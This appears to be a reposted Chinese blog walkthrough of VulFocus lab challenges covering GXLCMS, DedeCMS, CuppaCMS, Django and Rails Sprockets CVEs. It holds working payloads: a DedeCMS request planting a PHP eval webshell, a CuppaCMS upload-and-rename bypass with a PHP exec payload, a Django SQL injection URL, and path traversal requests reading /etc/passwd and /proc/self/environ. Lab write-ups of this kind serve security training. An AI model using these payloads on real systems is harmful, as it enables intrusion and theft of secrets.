当前位置: 首页 > news >正文

漏洞指北-VulFocus靶场专栏-中级03

漏洞指北-VulFocus靶场专栏-初级03

  • 中级009 🌸gxlcms-cve_2018_14685🌸
        • step1:安装系统 密码root
        • step2 进入后台页面 账号密码:admin amdin888
        • step3 查看详细 有phpinfo()
  • 中级010 🌸dedecms-cnvd_2018_01221🌸
        • step1:登录admin admin
        • step2:加入 请求头payload
        • step3 写入abc.lib.php文件(这个好使,上面那个试一下没反应)直接看phpinfo()
  • 中级011 🌸cuppacms-cve_2020_26048🌸
        • step1:登录admin 123456
        • step2: 选择file manager
        • step3 上传php文件的图片格式,拦截请求
        • step4 修改post 重命名格式
        • step5 删除.htaccess文件
        • step6 看怎么写了,如果写一句话木马,那就用中国蚁剑连接,我没用,我直接写的 ls /tmp语句,点入网址就行
  • 中级012 🌸django SQL注入(CVE-2019-14234)🌸
        • step1:进入后台
        • step2: 加入payload
        • step3:搜索flag即可
  • 中级013 🌸Ruby On Rails 路径遍历漏洞(CVE-2018-3760)🌸
        • step1:验证漏洞路径
        • step2 burp suite抓包
        • step3 改包 ,response里寻找flag

中级009 🌸gxlcms-cve_2018_14685🌸

原因
Gxlcms 1.1.4版本中的www/Lib/Lib/Action/Admin/TplAction.class.php文件的‘add’函数存在安全漏洞。远程攻击者可通过发送特制的index.php?s=Admin-Tpl-ADD-id请求利用该漏洞读取任意文件.
账号:admin 密码:admin888
解决方案:

step1:安装系统 密码root

http://10.11.12.28:17302/manager/login.php
在这里插入图片描述

step2 进入后台页面 账号密码:admin amdin888

在这里插入图片描述

step3 查看详细 有phpinfo()

在这里插入图片描述
在这里插入图片描述

中级010 🌸dedecms-cnvd_2018_01221🌸

原因:最好用火狐 有hackbar免费插件
Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。
解决方案:

step1:登录admin admin

step2:加入 请求头payload

http://10.11.12.28:43491/dede/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=%3C?php%20@eval($_POST[cmd]);?%3E
在这里插入图片描述

step3 写入abc.lib.php文件(这个好使,上面那个试一下没反应)直接看phpinfo()

http://10.11.12.28:43491/dede/tpl.php?action=savetagfile&token=ff5cd321ece87d556508192c04821ff0&filename=abc.lib.php&content=%3C?php%20phpinfo();?%3E
http://10.11.12.28:43491/dede/tag_test_action.php
在这里插入图片描述
在这里插入图片描述

中级011 🌸cuppacms-cve_2020_26048🌸

原因
CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。
解决方案:

step1:登录admin 123456

step2: 选择file manager

在File Mangager功能中的rename功能是通过前端js进行的,导致rename功能可以抓包绕过,改为.php后缀,导致shell。
在这里插入图片描述

step3 上传php文件的图片格式,拦截请求

在这里插入图片描述
l拦截错包了,是是第二个包,看清post的头是不是filemanager
在这里插入图片描述

step4 修改post 重命名格式

在这里插入图片描述

step5 删除.htaccess文件

在这里插入图片描述

step6 看怎么写了,如果写一句话木马,那就用中国蚁剑连接,我没用,我直接写的 ls /tmp语句,点入网址就行

<?php
exec("ls /tmp",$out);
print_r($out);
?>

在这里插入图片描述

中级012 🌸django SQL注入(CVE-2019-14234)🌸

原因
Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。

该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。可以利用CVE-2019-14234(SQL注入漏洞)向服务器传送包含CVE-2019-9193(命令执行漏洞)系统命令的SQL语句,从而利用SQL语句,执行任意系统命令。
解决方案:

step1:进入后台

http://10.11.12.28:28718/admin/

step2: 加入payload

/admin/vuln/collection/?detail__a%27b=123

step3:搜索flag即可

在这里插入图片描述

中级013 🌸Ruby On Rails 路径遍历漏洞(CVE-2018-3760)🌸

原因
环境中使用 Sprockets 作为静态文件服务器。Sprockets 是一个编译和分发静态资源文件的 Ruby 库。 Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞。攻击者可以%252e%252e/用来访问根目录并读取或执行目标服务器上的任何文件。
解决方案:

step1:验证漏洞路径

http://10.11.12.28:10368/assets/file:%2f%2f/etc/passwd
在这里插入图片描述

step2 burp suite抓包

在这里插入图片描述

step3 改包 ,response里寻找flag

GET /assets/file:%2F%2F/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/proc/self/environ HTTP/1.1
在这里插入图片描述

http://www.lryc.cn/news/132513.html

相关文章:

  • 【leetcode 力扣刷题】数组交集(数组、set、map都可实现哈希表)
  • MySQL 8.0.31 登录提示caching_sha2_password问题解决方法
  • [Google] DeepMind Gemini: 新一代LLM结合AlphaGo技术将力压 GPT-4|未来 AI 领域的新巨头
  • Maven高级
  • 【视觉SLAM入门】5.2. 2D-3D PNP 3D-3D ICP BA非线性优化方法 数学方法SVD DLT
  • 人脸老化预测(Python)
  • AWS SDK 3.x for .NET Framework 4.0 可行性测试
  • 两个list。如何使用流的写法将一个list中的对象中的某些属性根据另外一个list中的属性值赋值进去?
  • 美国陆军希望大数据技术能够帮助保护其云安全
  • vue 文字跑马灯
  • 开源ChatGPT系统源码 采用NUXT3+Laravel9后端开发 前后端分离版本
  • 【LeetCode|数据结构】剑指 Offer 33. 二叉搜索树的后序遍历序列
  • 自定义协程
  • 【Atcoder】 [ABC240Ex] Sequence of Substrings
  • 真机二阶段之堆叠技术
  • 简单、快速、无需注册的在线 MockJs 工具
  • 【Linux取经路】探索进程状态之僵尸进程 | 孤儿进程
  • 第十二章MyBatis动态SQL
  • redis--发布订阅
  • 链表2-两两交换链表中的节点删除链表的倒数第N个节点链表相交环形链表II
  • 数据结构之并查集
  • [element-ui] el-date-picker a-range-picker type=“daterange“ rules 校验
  • Dockers搭建个人网盘、私有仓库,Dockerfile制作Nginx、Lamp镜像
  • 2023 CCPC 华为云计算挑战赛 hdu7401 流量监控(树形dp)
  • 01.Django入门
  • 亿赛通电子文档安全管理系统任意文件上传漏洞(2023-HW)
  • docker限制容器日志大小
  • 底层驱动实现数码管显示温湿度数值功能
  • 03架构管理之测试管理
  • 30、devtools 依赖关于自动重启(自动加载页面)的知识